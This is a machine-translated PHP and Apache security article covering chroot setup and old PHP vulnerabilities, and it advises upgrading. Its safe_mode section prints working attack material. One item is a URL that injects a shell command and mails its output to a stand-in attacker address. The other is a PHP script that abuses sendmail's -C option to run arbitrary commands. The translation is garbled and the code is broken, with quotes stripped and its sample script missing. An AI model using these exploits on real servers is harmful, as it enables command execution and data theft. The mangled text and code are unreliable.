One, Web server security
PHP is nothing but a Web server module function, so first of all to ensure the security of the Web server. Of course, the Web server to be secure and must first ensure that the system security, so it is far, endless. PHP can be combined with a variety of Web servers, and only Apache is discussed here. It is highly recommended that you start Apache in a chroot way, so that even if the Apache and PHP and its scripts are compromised, it is only the imprisoned system that is affected and does not compromise the actual system. However, the use of Chroot Apache, the application will also bring some trouble, such as the connection to MySQL must use the 127.0.0.1 address using a TCP connection and can not use the localhost socket connection, which will be a little less efficient. There is also the mail function to send mail is also a problem, because in the php.ini:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
are aimed at the Win32 platform, so need to adjust the chroot environment good sendmail.
Second, the problem of PHP itself
1. Remote Overflow
PHP-4.1.2 all versions below have a file upload remote buffer Overflow vulnerability, and the attack program has been widely circulated, the success rate is very high.
2. Remote denial of service
PHP-4.2.0 and PHP-4.2.1 exist PHP multipart/form-data POST request processing remote vulnerabilities, although they do not have local user rights, but can also cause a denial of service.
3, Safe_mode bypass the vulnerability
There are PHP-4.2.2. The PHP mail function bypasses the Safe_mode limit to execute a command vulnerability, and the 4.0.5 Start Mail function adds a fifth parameter, because the designer can break through the Safe_mode restrictions to execute the command. 4.0.5 version of the breakthrough is very simple, just separated by semicolons with the shell command, such as the existence of PHP script evil.php:
Execute the following URL:
HTTP://FOO.COM/EVIL.PHP?BAR=;/USR/BIN/ID Mail evil@domain.com
This sends the result of the ID execution to evil@domain.com.
For 4.0.6 to 4.2.2 PHP breakthrough Safe_mode limit is actually taking advantage of the SendMail-c parameter, so the system must be using SendMail. The following code can break through the Safe_mode limit execution command:
#注意, the following two must not exist, or their owners and scripts are the same:
$script=/tmp/script123;
$cf=/tmp/cf123;
$fd = fopen($cf, w);
fwrite($fd, OQ/tmp
Sparse=0
R$* . chr(9) . $#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script);
fclose($fd);
$fd = fopen($script, w);
fwrite($fd, rm -f $script $cf; );
fwrite($fd, $cmd);
fclose($fd);
mail(nobody, , , , -C$cf);
?>
Or use the above problematic version of PHP users must upgrade to the latest version in time, so as to eliminate basic security issues.